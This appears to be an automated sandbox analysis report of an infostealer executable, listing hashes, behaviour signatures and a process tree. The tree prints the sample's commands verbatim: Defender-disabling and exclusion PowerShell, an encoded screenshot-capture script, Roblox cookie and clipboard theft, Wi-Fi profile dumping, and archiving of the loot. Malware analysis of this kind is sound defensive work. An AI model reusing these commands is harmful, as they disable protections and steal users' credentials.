Analysis

  • max time kernel
    93s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 07:18

General

  • Target

    sppawx.exe

  • Size

    7.5MB

  • MD5

    546606959cb5b178d679b203d938cf88

  • SHA1

    f907e7d19734bf7459388b3299822858f0039711

  • SHA256

    5184b92097feeecf09d4e92b58c252333d397b3b7c424b62e73ae2fc2f6be405

  • SHA512

    be3efba75f20cffbad2b5209e308e95aca31861b8dff5461ce386f10d8276caf73a827bcf415120c07feff815f7099aa29f2b55b22b01301def62d75f478439c

  • SSDEEP

    196608:JNLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jk:TL+9qz8LD7fEUbiIqQgpk

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sppawx.exe
    "C:\Users\Admin\AppData\Local\Temp\sppawx.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1532
    • C:\Users\Admin\AppData\Local\Temp\sppawx.exe
      "C:\Users\Admin\AppData\Local\Temp\sppawx.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sppawx.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sppawx.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1844
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2252
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:828
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
          4⤵
            PID:1068
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4980
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2056
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1824
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2280
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:396
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:2540
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3348
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:2700
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1960
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:2712
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:3020
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4420
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4564
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3600
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:556
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3748
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2268
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:1536
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:4040
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                  • Clipboard Data
                  • Suspicious use of WriteProcessMemory
                  PID:2132
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2240
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:1116
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:1908
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    3⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:4584
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profile
                      4⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:2440
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:440
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:4252
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:212
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:2496
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:3220
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:4732
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:3924
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4548
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o0ks1vei\o0ks1vei.cmdline"
                                    5⤵
                                      PID:452
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D1D.tmp" "c:\Users\Admin\AppData\Local\Temp\o0ks1vei\CSC63E9FBC24FC740D29174BD10E1ED7080.TMP"
                                        6⤵
                                          PID:2312
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4032
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:3708
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1948
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:3712
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:1500
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:3948
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              3⤵
                                                PID:512
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  4⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:316
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:4084
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:3052
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:4744
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:1428
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:2932
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:4856
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:3724
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:3272
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:3540
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3932
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:1776
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2240
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                  3⤵
                                                                    PID:4928
                                                                    • C:\Windows\system32\getmac.exe
                                                                      getmac
                                                                      4⤵
                                                                        PID:4860
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI15322\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\gbY5M.zip" *"
                                                                      3⤵
                                                                        PID:5024
                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI15322\rar.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI15322\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\gbY5M.zip" *
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:1988
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                        3⤵
                                                                          PID:884
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic os get Caption
                                                                            4⤵
                                                                              PID:536
                                                                          • C:\Windows\system32\cmd.exe
